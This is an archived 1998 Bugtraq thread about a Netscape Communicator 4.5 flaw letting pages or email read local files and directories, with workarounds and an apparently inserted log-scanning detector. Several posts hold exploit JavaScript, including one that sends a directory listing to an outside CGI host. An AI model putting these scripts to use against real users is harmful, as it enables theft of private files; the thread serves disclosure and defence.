Packet Storm: PACKETSTORM:15236
netscape4.5-read-dir.txt
Aug 17, 1999
packetstormsecurity.com
----------------------------------------------------------------  
  
Date: Mon, 23 Nov 1998 10:36:40 PST  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: Netscape Communicator 4.5 can read local files  
  
There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for  
WinNT 4.0  
(probably others) which allows reading files from the user's computer.  
It is not necessary the file name to be known, because directories may  
be browsed.  
The contents of the file may be sent to an arbitrary host. In order this  
to work, you need both Java and Javascript  
enabled. The bug may be exploited by email message.  
  
Demonstration is available at:  
http://www.geocities.com/ResearchTriangle/1711/b6.html  
  
Workaround: Disable Javascript or Java.  
  
  
The Javascript code is:  
  
sl=window.open("wysiwyg://1/file:///C|/");  
sl2=sl.window.open();  
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your file: \";"+  
"var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new java.io.FileInputStream(f);"+  
"i=0; while ( ((a=fis.read()) != -1) && (i<100) ) { b += String.fromCharCode(a);i++;}"+  
"alert(b);</'+'SCRIPT>'";  
  
Regards,  
Georgi Guninski  
http://www.geocities.com/ResearchTriangle/1711  
  
----------------------------------------------------------------  
  
Date: Mon, 23 Nov 1998 20:49:37 +0000  
From: The Spirit of the Black Panther <[email protected]>  
To: [email protected]  
Subject: Re: Netscape Communicator 4.5 can read local files  
  
I have just tested this bug in Netscape 4.5 on a RedHat Linux 5.1 machine,  
Kernel 2.0.34 and with minor patching of the java, it is also effective. I  
was successful in retrieving ANY LOCAL FILE with the World readable  
attribute. This includes the /etc/passwd file! In netscape,  
Edit>Preferences>Advanced>Disable Javascript in Mail and News will block  
this exploit, unless the person has access to your web server.  
  
----------------------------------------------------------------  
  
Date: Tue, 24 Nov 1998 20:23:25 -0800  
From: Ryan Russell <[email protected]>  
To: [email protected]  
Subject: Re: Netscape Communicator 4.5 can read local files  
  
It's vastly different. Did you try creating c:\test.txt and putting  
something in it, and going to that page? Notice that it pops  
the first line in a dialog box. That means it has that info  
under programmatic control, and can send it across the network  
back to the web server, exactly as claimed in the original  
advisory.  
  
Contrast that with (you) opening your c: drive with Communicator.  
You can browse local files, but only you get to see the contents,  
and that window isn't under any kind of programmatic control  
from other windows... at least that's how it's supposed to work.  
  
It's similar to the Java sandbox concept. Local and signed  
content are "trusted" and can do whatever they like, whereas  
remotely loaded content are "untrusted" and aren't supposed  
to be able to perform certain operations. When you (well,  
Netscape and Microsoft) try to mix the two, invariably mistakes  
will be made, and leaks will happen between the two.  
  
  
Ryan  
  
----------------------------------------------------------------  
  
Date: Wed, 25 Nov 1998 17:19:41 +1300  
From: Andrew McNaughton <[email protected]>  
To: [email protected]  
Subject: Re: Netscape Communicator 4.5 can read local files  
  
The demonstration exploit puts your file on screen, but could as easily  
have passed it back to the server the javascript came from. Simply  
replace alert(b) with appropriate code.  
  
Andrew McNaughton  
  
----------------------------------------------------------------  
  
Trev ([email protected])  
Mon, 23 Nov 1998 14:05:16 -0800   
  
At 10:36 AM 11/23/98 PST, Georgi Guninski wrote:  
>There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for  
>WinNT 4.0  
>(probably others)  
  
FYI: It also works on 4.04 for Win95 but the opening of the new navigator  
window is a dead giveaway, though it would be less suspicious to load the  
directory listing into a mini frame with some actual content in the other.  
I would guess you could code up some javascript to url encode the contents  
of the file and send it to a malicious cgi that could read it from the  
query string. There are no warnings given for information submitted via  
the "get" method.  
  
Trev  
  
----------------------------------------------------------------  
  
Pavel Kankovsky ([email protected])  
Wed, 25 Nov 1998 20:13:13 +0100   
  
On Wed, 25 Nov 1998, Ben Collins wrote:  
  
> If someone here can set up a webpage, send me the URL, have that page read  
> the file '/test.txt' from my hard drive and then that person send the  
> contents to this list, I will believe. Otherwise I think this whole  
> hysteria over 'unforeseen' dangers should stop.  
  
replace alert(b) with  
  
w=window.open(\"some_url?\"+escape(b));  
  
and make sure some_url points to a cgi script recording its $QUERY_STRING  
(in fact, the text would be recorded in access_log as well)  
  
BTW: it seems both Java and JavaScripts must be enabled  
  
--Pavel Kankovsky aka Peak [ Boycott Czech Telecom--http://www.bojkot.cz ]  
"spt Telecom... now we're raising the price of tomorrow!" [ Engl. lang. info-- .../english/ ]  
  
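Pavel's point that the exfiltrated text lands in the CGI's $QUERY_STRING and in access_log is also where a defender can look for it. The following is an added example, not code from this thread: a small Node.js scan over constructed Apache access_log lines that flags GET query strings which decode to passwd-format records or to newline-separated directory listings. The client addresses, CGI paths and the two heuristics are assumptions.

```javascript
// Added example, not code from the thread: a defender's pass over Apache
// access_log lines looking for GET query strings that decode to file contents
// (escape(b) appended to a CGI URL). Log lines, paths, addresses and the
// heuristics below are constructed for illustration.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) ([^"\s]+) [^"]*" (\d{3}) \S+/;

// Decode a request target's query string. Fall back to legacy unescape()
// because escape() emits %uXXXX sequences that decodeURIComponent rejects.
function decodeQuery(target) {
  const q = target.indexOf("?");
  if (q < 0) return "";
  const raw = target.slice(q + 1).replace(/\+/g, " ");
  try { return decodeURIComponent(raw); } catch (e) { return unescape(raw); }
}

// Heuristics for "this is a file, not a form field": a passwd-style record,
// or several newline-separated bare names as a directory listing would produce.
function classify(decoded) {
  const reasons = [];
  if (/^[^:\n]+:[^:\n]*:\d+:\d+:/m.test(decoded)) reasons.push("passwd-format record");
  const lines = decoded.split(/\r?\n/).filter(Boolean);
  if (lines.length >= 5 && lines.every((l) => /^[^\s\/\\?&=]{1,64}$/.test(l)))
    reasons.push("newline-separated file listing");
  if (decoded.length >= 512) reasons.push("oversized query (" + decoded.length + " bytes)");
  return reasons;
}

// Parse combined-format lines and return the suspicious GET requests.
function scanAccessLog(text) {
  const hits = [];
  for (const line of text.split("\n")) {
    const m = LOG_RE.exec(line);
    if (!m || m[3] !== "GET") continue;
    const reasons = classify(decodeQuery(m[4]));
    if (reasons.length) hits.push({ client: m[1], when: m[2], status: m[5], path: m[4].split("?")[0], reasons });
  }
  return hits;
}
// Constructed sample log: a page load, two exfiltration-style requests, a normal search.
const SAMPLE_LOG = [
  '10.0.0.5 - - [25/Nov/1998:14:13:05 -0800] "GET /cgi-bin/test.html HTTP/1.0" 200 1432',
  '10.0.0.5 - - [25/Nov/1998:14:13:07 -0800] "GET /cgi-bin/query_string.cgi?'
    + escape("root:x:0:0:root:/root:/bin/sh\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n") + ' HTTP/1.0" 200 12',
  '10.0.0.9 - - [25/Nov/1998:14:14:01 -0800] "GET /cgi-bin/query_string.cgi?'
    + escape("AUTOEXEC.BAT\nCONFIG.SYS\nWINDOWS\nPROGRA~1\nIO.SYS\nMSDOS.SYS\n") + ' HTTP/1.0" 200 12',
  '10.0.0.7 - - [25/Nov/1998:14:15:00 -0800] "GET /search.cgi?q=netscape+4.5 HTTP/1.0" 200 880',
].join("\n");

for (const h of scanAccessLog(SAMPLE_LOG))
  console.log(h.when, h.client, h.path, "->", h.reasons.join("; "));
```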
----------------------------------------------------------------  
  
Date: Wed, 25 Nov 1998 14:13:05 -0800  
From: Trev <[email protected]>  
To: [email protected]  
Subject: Re: Netscape Communicator 4.5 can read local files  
  
At 12:48 PM 11/25/98 -0500, Ben Collins wrote:  
>If someone here can set up a webpage, send me the URL, have that page read  
>the file '/test.txt' from my hard drive and then that person send the  
>contents to this list, I will believe. Otherwise I think this whole  
>hysteria over 'unforeseen' dangers should stop.  
  
I've whipped up a couple of demos of this bug that send the contents to a  
cgi. There is a windows version that I know works, and a unix version I  
can't test because my linux box is down (it's a hardware thing). This is  
for anyone who has doubts....  
  
http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)  
  
http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)  
  
And yes, it can email it to you if you like :)  
  
Trev  
  
----------------------------------------------------------------  
  
Date: Wed, 25 Nov 1998 15:28:45 -0500  
From: Terence Christopher Haddock <[email protected]>  
Reply-To: [email protected]  
To: [email protected]  
Subject: Re: Netscape Communicator 4.5 can read local files  
  
This security hole is not limited to knowing a specific file name,  
it can be used to list the contents of a directory, which I believe is  
much more insidious. This script can send a list of the files in the  
user's root directory under windows:  
  
sl=window.open("wysiwyg://1/file://C|/");  
sl2=sl.window.open();  
sl2.location="javascript:"+  
"b=\"Here is the files in your root directory:\";"+  
"var f=new java.io.File(\"C:\\\\\");"+  
"var files=f.list();"+  
"for (var x=0;x<files.length;x++){"+  
"b+=files[x]+\"\\n\""+  
"};"+  
"alert(b);";  
  
(Simple to modify it for UNIX)  
Using a search algorithm the script could search for specific  
files by running this recursively. The only problem (from a hacker's  
perspective, a good thing from our perspective) is all of the windows it  
would open. If a way could be worked around this (which I think it can),  
this script could run without a user even knowing it, searching the user's  
directories and reporting them to a server.  
  
Sincerely,  
Terence C. Haddock  
  
----------------------------------------------------------------  
  
Terence Christopher Haddock ([email protected])  
Wed, 25 Nov 1998 14:22:12 -0500   
  
  
Ben Collins's file contains the text "this is really stupid.". He's  
running a UNIX version of Netscape, so I had to modify the script.  
Unfortunately, the following does not work under both UNIX and Windows:  
  
sl=window.open("wysiwyg://1/file://");  
  
It works under UNIX, but not under Windows. A simple check of the  
OS would take care of the distinction, however, so that wouldn't slow any  
would-be hackers down. Also, if they know their target, then they know  
what kind of OS they're dealing with.  
  
Sincerely,  
Terence C. Haddock  
University of Delaware  
  
On Wed, 25 Nov 1998, Ben Collins wrote:  
  
> I would just like to say that I find it hard to believe so much fuss has  
> been made about this. It is clear that this is only a local 'trick' to  
> look like it has gotten info. There used to be earlier versions of this  
> where ppl would make a link to file:///C|/ and say they had your hard drive  
> contents on their webpage, and now that java/javascript is involved  
> everyone is freaking out over the same thing just done a little more  
> elaborately.  
>  
> If someone here can set up a webpage, send me the URL, have that page read  
> the file '/test.txt' from my hard drive and then that person send the  
> contents to this list, I will believe. Otherwise I think this whole  
> hysteria over 'unforeseen' dangers should stop.  
>  
> --  
> ----- -- - -------- --------- ---- ------- ----- - - --- --------  
> Ben Collins <[email protected]> Debian GNU/Linux  
> UnixGroup Admin - Jordan Systems Inc. [email protected]  
> ------ -- ----- - - ------- ------- -- The Choice of the GNU Generation  
  
----------------------------------------------------------------  
  
Date: Thu, 26 Nov 1998 12:31:35 +0100  
From: Michael Teichmann <[email protected]>  
To: [email protected]  
Subject: Re: Netscape Communicator 4.5 can read local files  
  
> I've whipped up a couple of demos of this bug that send the contents to a  
> cgi. There is a windows version that I know works, and a unix version I  
> can't test because my linux box is down (it's a hardware thing). This is  
> for anyone who has doubts....  
>  
> http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)  
>  
> http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)  
>  
> And yes, it can email it to you if you like :)  
  
And if you wish, it can even read your directory structure: (works for  
Win, but Unix should be straightforward)  
  
//slight change of Trev's script:  
<SCRIPT>  
alert("List your files in C:\\ and it will be sent to a cgi script.");  
  
sl=window.open("wysiwyg://1/file:///C|/");  
sl2=sl.window.open();  
sl2.location="javascript:s='<SCRIPT>b=\"\";"+  
"var f = new java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0;"+  
"while(i < fl.length) {b += fl[i]+\"\\\\n\"; i++;}"+  
"w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";  
  
</SCRIPT>  
  
  
At least it seems it can not *write* to local files,  
I get a security exception when I try that.  
  
----------------------------------------------------------------  
  
Date: Thu, 26 Nov 1998 17:43:31 +0100  
From: Norbert Luckhardt <[email protected]>  
To: [email protected]  
Subject: Re: Netscape Communicator 4.5 can read local files  
  
-----BEGIN PGP SIGNED MESSAGE-----  
  
Hi there,  
  
At 19:36 23.11.98 , you wrote:  
>There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for  
>WinNT 4.0 (probably others)  
  
we just tried it on the Mac - surely the script has to be  
adapted since the Mac doesn't use drive letters - so if you  
don't know the names of the drives you cannot give an  
absolute path - but it could work with relative paths:  
  
sl=window.open("wysiwyg://1/file:////");  
  
those 4 slashes show the directory in which netscape is  
installed (every extra slash goes one dir up)  
  
it is at least possible to get files from that directory  
with:  
  
java.io.File(\"test.txt\")  
  
alas I'm not so firm with JavaScript and thus I did not get  
a working code with the quoting for higher dir levels -  
earned only JavaScript Errors  
  
but I think this is only my personal problem, isn't it?! ;-)  
  
have fun, Shalom dann,  
Norbert  
  
--  
Norbert Luckhardt http://www.heise.de/ct/Redaktion/nl/  
Redaktion c't Tel.: +49 511 5352 - 300 Fax: +49 511 5352 - 417  
Helstorfer Str. 7 D-30625 Hannover BBS: +49 511 5352 - 301  